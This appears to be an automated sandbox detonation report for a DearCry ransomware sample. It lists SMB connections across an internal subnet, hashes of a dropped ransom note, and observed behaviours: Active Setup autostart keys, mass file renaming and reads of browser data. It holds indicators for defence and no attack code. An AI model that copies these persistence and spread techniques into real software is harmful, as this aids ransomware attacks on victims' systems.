| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.255.2:445 | tcp | |
| N/A | 10.127.255.14:445 | tcp | |
| N/A | 10.127.255.28:445 | tcp | |
| N/A | 10.127.255.24:445 | tcp | |
| N/A | 10.127.255.30:445 | tcp | |
| N/A | 10.127.255.9:445 | tcp | |
| N/A | 10.127.255.64:445 | tcp | |
| N/A | 10.127.255.46:445 | tcp | |
| N/A | 10.127.255.53:445 | tcp | |
| N/A | 10.127.255.35:445 | tcp | |
| N/A | 10.127.255.41:445 | tcp | |
| N/A | 10.127.255.50:445 | tcp | |
| N/A | 10.127.255.51:445 | tcp | |
| N/A | 10.127.255.34:445 | tcp | |
| N/A | 10.127.255.18:445 | tcp | |
| N/A | 10.127.255.20:445 | tcp | |
| N/A | 10.127.255.27:445 | tcp | |
| N/A | 10.127.255.58:445 | tcp | |
| N/A | 10.127.255.12:445 | tcp | |
| N/A | 10.127.255.37:445 | tcp | |
| N/A | 10.127.255.44:445 | tcp | |
| N/A | 10.127.255.63:445 | tcp | |
| N/A | 10.127.255.43:445 | tcp | |
| N/A | 10.127.255.57:445 | tcp | |
| N/A | 10.127.255.55:445 | tcp | |
| N/A | 10.127.255.8:445 | tcp | |
| N/A | 10.127.255.59:445 | tcp | |
| N/A | 10.127.255.21:445 | tcp | |
| N/A | 10.127.255.11:445 | tcp | |
| N/A | 10.127.255.60:445 | tcp | |
| N/A | 10.127.255.40:445 | tcp | |
| N/A | 10.127.255.25:445 | tcp | |
| N/A | 10.127.255.31:445 | tcp | |
| N/A | 10.127.255.61:445 | tcp | |
| N/A | 10.127.255.1:445 | tcp | |
| N/A | 10.127.255.49:445 | tcp | |
| N/A | 10.127.255.54:445 | tcp | |
| N/A | 10.127.255.29:445 | tcp | |
| N/A | 10.127.255.32:445 | tcp | |
| N/A | 10.127.255.10:445 | tcp | |
| N/A | 10.127.255.4:445 | tcp | |
| N/A | 10.127.255.5:445 | tcp | |
| N/A | 10.127.255.6:445 | tcp | |
| N/A | 10.127.255.22:445 | tcp | |
| N/A | 10.127.255.238:445 | tcp | |
| N/A | 10.127.255.0:445 | tcp | |
| N/A | 10.127.255.42:445 | tcp | |
| N/A | 10.127.255.65:445 | tcp | |
| N/A | 10.127.255.47:445 | tcp | |
| N/A | 10.127.255.17:445 | tcp | |
| N/A | 10.127.255.56:445 | tcp | |
| N/A | 10.127.255.3:445 | tcp | |
| N/A | 10.127.255.26:445 | tcp | |
| N/A | 10.127.255.39:445 | tcp | |
| N/A | 10.127.255.38:445 | tcp | |
| N/A | 10.127.255.16:445 | tcp | |
| N/A | 10.127.255.33:445 | tcp | |
| N/A | 10.127.255.52:445 | tcp | |
| N/A | 10.127.255.62:445 | tcp | |
| N/A | 10.127.255.23:445 | tcp | |
| N/A | 10.127.255.15:445 | tcp | |
| N/A | 10.127.255.13:445 | tcp | |
| N/A | 10.127.255.48:445 | tcp | |
| N/A | 10.127.255.7:445 | tcp | |
| N/A | 10.127.255.19:445 | tcp | |
| N/A | 10.127.255.45:445 | tcp | |
| N/A | 10.127.255.36:445 | tcp | |
| N/A | 10.127.255.237:445 | tcp | |
| N/A | 10.127.255.124:445 | tcp | |
| N/A | 10.127.255.103:445 | tcp | |
| N/A | 10.127.255.122:445 | tcp | |
| N/A | 10.127.255.72:445 | tcp | |
| N/A | 10.127.255.98:445 | tcp | |
| N/A | 10.127.255.69:445 | tcp | |
| N/A | 10.127.255.82:445 | tcp | |
| N/A | 10.127.255.79:445 | tcp | |
| N/A | 10.127.255.192:445 | tcp | |
| N/A | 10.127.255.73:445 | tcp | |
| N/A | 10.127.255.109:445 | tcp | |
| N/A | 10.127.255.96:445 | tcp | |
| N/A | 10.127.255.68:445 | tcp | |
| N/A | 10.127.255.107:445 | tcp | |
| N/A | 10.127.255.80:445 | tcp | |
| N/A | 10.127.255.99:445 | tcp | |
| N/A | 10.127.255.70:445 | tcp | |
| N/A | 10.127.255.123:445 | tcp | |
| N/A | 10.127.255.104:445 | tcp | |
| N/A | 10.127.255.120:445 | tcp | |
| N/A | 10.127.255.111:445 | tcp | |
| N/A | 10.127.255.77:445 | tcp | |
| N/A | 10.127.255.102:445 | tcp | |
| N/A | 10.127.255.81:445 | tcp | |
| N/A | 10.127.255.112:445 | tcp | |
| N/A | 10.127.255.91:445 | tcp | |
| N/A | 10.127.255.97:445 | tcp | |
| N/A | 10.127.255.105:445 | tcp | |
| N/A | 10.127.255.113:445 | tcp | |
| N/A | 10.127.255.100:445 | tcp | |
| N/A | 10.127.255.95:445 | tcp | |
| N/A | 10.127.255.125:445 | tcp | |
| N/A | 10.127.255.71:445 | tcp | |
| N/A | 10.127.255.128:445 | tcp | |
| N/A | 10.127.255.78:445 | tcp | |
| N/A | 10.127.255.89:445 | tcp | |
| N/A | 10.127.255.121:445 | tcp | |
| N/A | 10.127.255.90:445 | tcp | |
| N/A | 10.127.255.75:445 | tcp | |
| N/A | 10.127.255.108:445 | tcp | |
| N/A | 10.127.255.126:445 | tcp | |
| N/A | 10.127.255.83:445 | tcp | |
| N/A | 10.127.255.127:445 | tcp | |
| N/A | 10.127.255.88:445 | tcp | |
| N/A | 10.127.255.106:445 | tcp | |
| N/A | 10.127.255.129:445 | tcp | |
| N/A | 10.127.255.132:445 | tcp | |
| N/A | 10.127.255.157:445 | tcp | |
| N/A | 10.127.255.174:445 | tcp | |
| N/A | 10.127.255.141:445 | tcp | |
| N/A | 10.127.255.171:445 | tcp | |
| N/A | 10.127.255.139:445 | tcp | |
| N/A | 10.127.255.156:445 | tcp | |
| N/A | 10.127.255.164:445 | tcp | |
| N/A | 10.127.255.148:445 | tcp | |
| N/A | 10.127.255.147:445 | tcp | |
| N/A | 10.127.255.166:445 | tcp | |
| N/A | 10.127.255.173:445 | tcp | |
| N/A | 10.127.255.86:445 | tcp | |
| N/A | 10.127.255.138:445 | tcp | |
| N/A | 10.127.255.163:445 | tcp | |
| N/A | 10.127.255.155:445 | tcp | |
| N/A | 10.127.255.67:445 | tcp | |
| N/A | 10.127.255.135:445 | tcp | |
| N/A | 10.127.255.160:445 | tcp | |
| N/A | 10.127.255.101:445 | tcp | |
| N/A | 10.127.255.114:445 | tcp | |
| N/A | 10.127.255.161:445 | tcp | |
| N/A | 10.127.255.115:445 | tcp | |
| N/A | 10.127.255.241:445 | tcp | |
| N/A | 10.127.255.151:445 | tcp | |
| N/A | 10.127.255.170:445 | tcp | |
| N/A | 10.127.255.242:445 | tcp | |
| N/A | 10.127.255.74:445 | tcp | |
| N/A | 10.127.255.162:445 | tcp | |
| N/A | 10.127.255.93:445 | tcp | |
| N/A | 10.127.255.146:445 | tcp | |
| N/A | 10.127.255.130:445 | tcp | |
| N/A | 10.127.255.149:445 | tcp | |
| N/A | 10.127.255.118:445 | tcp | |
| N/A | 10.127.255.110:445 | tcp | |
| N/A | 10.127.255.143:445 | tcp | |
| N/A | 10.127.255.134:445 | tcp | |
| N/A | 10.127.255.145:445 | tcp | |
| N/A | 10.127.255.243:445 | tcp | |
| N/A | 10.127.255.94:445 | tcp | |
| N/A | 10.127.255.87:445 | tcp | |
| N/A | 10.127.255.131:445 | tcp | |
| N/A | 10.127.255.152:445 | tcp | |
| N/A | 10.127.255.159:445 | tcp | |
| N/A | 10.127.255.144:445 | tcp | |
| N/A | 10.127.255.168:445 | tcp | |
| N/A | 10.127.255.76:445 | tcp | |
| N/A | 10.127.255.142:445 | tcp | |
| N/A | 10.127.255.140:445 | tcp | |
| N/A | 10.127.255.169:445 | tcp | |
| N/A | 10.127.255.165:445 | tcp | |
| N/A | 10.127.255.119:445 | tcp | |
| N/A | 10.127.255.153:445 | tcp | |
| N/A | 10.127.255.92:445 | tcp | |
| N/A | 10.127.255.172:445 | tcp | |
| N/A | 10.127.255.137:445 | tcp | |
| N/A | 10.127.255.85:445 | tcp | |
| N/A | 10.127.255.116:445 | tcp | |
| N/A | 10.127.255.154:445 | tcp | |
| N/A | 10.127.255.136:445 | tcp | |
| N/A | 10.127.255.66:445 | tcp | |
| N/A | 10.127.255.117:445 | tcp | |
| N/A | 10.127.255.133:445 | tcp | |
| N/A | 10.127.255.150:445 | tcp | |
| N/A | 10.127.255.84:445 | tcp | |
| N/A | 10.127.255.158:445 | tcp | |
| N/A | 10.127.255.167:445 | tcp | |
| N/A | 10.127.255.220:445 | tcp | |
| N/A | 10.127.255.194:445 | tcp | |
| N/A | 10.127.255.215:445 | tcp | |
| N/A | 10.127.255.247:445 | tcp | |
| N/A | 10.127.255.184:445 | tcp | |
| N/A | 10.127.255.198:445 | tcp | |
| N/A | 10.127.255.230:445 | tcp | |
| N/A | 10.127.255.212:445 | tcp | |
| N/A | 10.127.255.183:445 | tcp | |
| N/A | 10.127.255.213:445 | tcp | |
| N/A | 10.127.255.197:445 | tcp | |
| N/A | 10.127.255.216:445 | tcp | |
| N/A | 10.127.255.219:445 | tcp | |
| N/A | 10.127.255.221:445 | tcp | |
| N/A | 10.127.255.205:445 | tcp | |
| N/A | 10.127.255.210:445 | tcp | |
| N/A | 10.127.255.229:445 | tcp | |
| N/A | 10.127.255.178:445 | tcp | |
| N/A | 10.127.255.204:445 | tcp | |
| N/A | 10.127.255.231:445 | tcp | |
| N/A | 10.127.255.228:445 | tcp | |
| N/A | 10.127.255.188:445 | tcp | |
| N/A | 10.127.255.244:445 | tcp | |
| N/A | 10.127.255.211:445 | tcp | |
| N/A | 10.127.255.233:445 | tcp | |
| N/A | 10.127.255.177:445 | tcp | |
| N/A | 10.127.255.207:445 | tcp | |
| N/A | 10.127.255.232:445 | tcp | |
| N/A | 10.127.255.195:445 | tcp | |
| N/A | 10.127.255.224:445 | tcp | |
| N/A | 10.127.255.199:445 | tcp | |
| N/A | 10.127.255.186:445 | tcp | |
| N/A | 10.127.255.181:445 | tcp | |
| N/A | 10.127.255.218:445 | tcp | |
| N/A | 10.127.255.254:445 | tcp | |
| N/A | 10.127.255.223:445 | tcp | |
| N/A | 10.127.255.176:445 | tcp | |
| N/A | 10.127.255.187:445 | tcp | |
| N/A | 10.127.255.246:445 | tcp | |
| N/A | 10.127.255.217:445 | tcp | |
| N/A | 10.127.255.226:445 | tcp | |
| N/A | 10.127.255.253:445 | tcp | |
| N/A | 10.127.255.193:445 | tcp | |
| N/A | 10.127.255.202:445 | tcp | |
| N/A | 10.127.255.191:445 | tcp | |
| N/A | 10.127.255.203:445 | tcp | |
| N/A | 10.127.255.227:445 | tcp | |
| N/A | 10.127.255.225:445 | tcp | |
| N/A | 10.127.255.222:445 | tcp | |
| N/A | 10.127.255.189:445 | tcp | |
| N/A | 10.127.255.248:445 | tcp | |
| N/A | 10.127.255.175:445 | tcp | |
| N/A | 10.127.255.208:445 | tcp | |
| N/A | 10.127.255.196:445 | tcp | |
| N/A | 10.127.255.251:445 | tcp | |
| N/A | 10.127.255.214:445 | tcp | |
| N/A | 10.127.255.235:445 | tcp | |
| N/A | 10.127.255.200:445 | tcp | |
| N/A | 10.127.255.180:445 | tcp | |
| N/A | 10.127.255.245:445 | tcp | |
| N/A | 10.127.255.201:445 | tcp | |
| N/A | 10.127.255.185:445 | tcp | |
| N/A | 10.127.255.240:445 | tcp | |
| N/A | 10.127.255.190:445 | tcp | |
| N/A | 10.127.255.209:445 | tcp | |
| N/A | 10.127.255.206:445 | tcp | |
| N/A | 10.127.255.179:445 | tcp | |
| N/A | 10.127.255.182:445 | tcp | |
| N/A | 10.127.255.234:445 | tcp | |
| N/A | 10.127.255.249:445 | tcp | |
| N/A | 10.127.255.239:445 | tcp | |
| N/A | 10.127.255.252:445 | tcp | |
| N/A | 10.127.255.250:445 | tcp | |
| N/A | 10.127.255.236:445 | tcp |
Files
C:\Program Files (x86)\R3ADM3.txt
| MD5 | e6f001fc98cb51a0429ca5dc95f6a950 |
| SHA1 | 16a73b95d0b5408fa95c97bc9f314f1eff4902b4 |
| SHA256 | acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b |
| SHA512 | 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c |
Analysis: behavioral24
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:39
Platform
win10v2004-20240704-en
Max time kernel
280s
Max time network
1813s
Command Line
Signatures
DearCry
Renames multiple (7382) files with added filename extension
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
